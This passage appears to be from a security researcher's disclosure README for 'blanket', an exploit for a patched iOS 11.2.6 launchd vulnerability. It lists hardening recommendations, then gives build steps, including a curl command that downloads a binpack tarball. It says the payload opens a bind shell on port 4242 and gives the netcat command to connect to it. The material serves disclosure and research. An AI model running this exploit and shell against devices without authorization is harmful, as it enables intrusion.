  2. Close the task_threads loophole allowing a non-platform binary to use the task port of a platform binary to achieve code execution.
  3. Fix crashing issues in ReportCrash.
  4. The set of Mach services reachable from within the container sandbox should be minimized. I do not see a legitimate reason for most iOS apps to communicate with ReportCrash or SafetyNet.
  5. As many processes as possible should be sandboxed. I’m not sure whether druid needs to be unsandboxed to function properly, but if not, it should be placed in an appropriate sandbox.
  6. Dead code should be eliminated. SafetyNet does not seem to be performing its intended functionality. If it is no longer needed, it should probably be removed.
  7. Close the host_set_exception_ports-based task_for_pid workaround. For example, consider whether it’s worth restricting host_set_exception_ports to root or restricting the usability of the host-priv port under some configurations. This violates the elegant capabilities-based design of Mach, but host_set_exception_ports might be a promising target for abuse.
  8. Consider whether it’s worth adding task_conversion_eval to task_inspect_t.

Running blanket

Blanket should work on any device running iOS 11.2.6.

  1. Download the project:
    git clone https://github.com/bazad/blanket
    cd blanket
    
  2. Download and build the threadexec library, which is required for blanket to inject code in processes and tasks:
    git clone https://github.com/bazad/threadexec
    cd threadexec
    make ARCH=arm64 SDK=iphoneos EXTRA_CFLAGS='-mios-version-min=11.1 -fembed-bitcode'
    cd ..
    
  3. Download Jonathan Levin’s iOS binpack, which contains the binaries that will be used by the bind shell. If you change the payload to do something else, you won’t need the binpack.
    mkdir binpack
    curl http://newosxbook.com/tools/binpack64-256.tar.gz | tar -xf- -C binpack
    
  4. Open Xcode and configure the project. You will need to change the signing identifier and specify a custom application group entitlement.
  5. Edit the file headers/config.h and change APP_GROUP to whatever application group identifier you specified earlier.

After that, you should be able to build and run the project on the device.

If blanket is successful, it will run the payload binary (source in blanket_payload/blanket_payload.c), which by default spawns a bind shell on port 4242. You can connect to that port with netcat and run arbitrary shell commands.
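
For example, assuming the device is reachable at 192.168.1.10 (a placeholder address):

nc 192.168.1.10 4242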

Credits

Many thanks to Ian Beer and Jonathan Levin for their excellent iOS security and internals research.

Timeline

Apple assigned the Mach port replacement vulnerability in launchd CVE-2018-4280, and it was patched in iOS 11.4.1 and macOS 10.13.6 on July 9.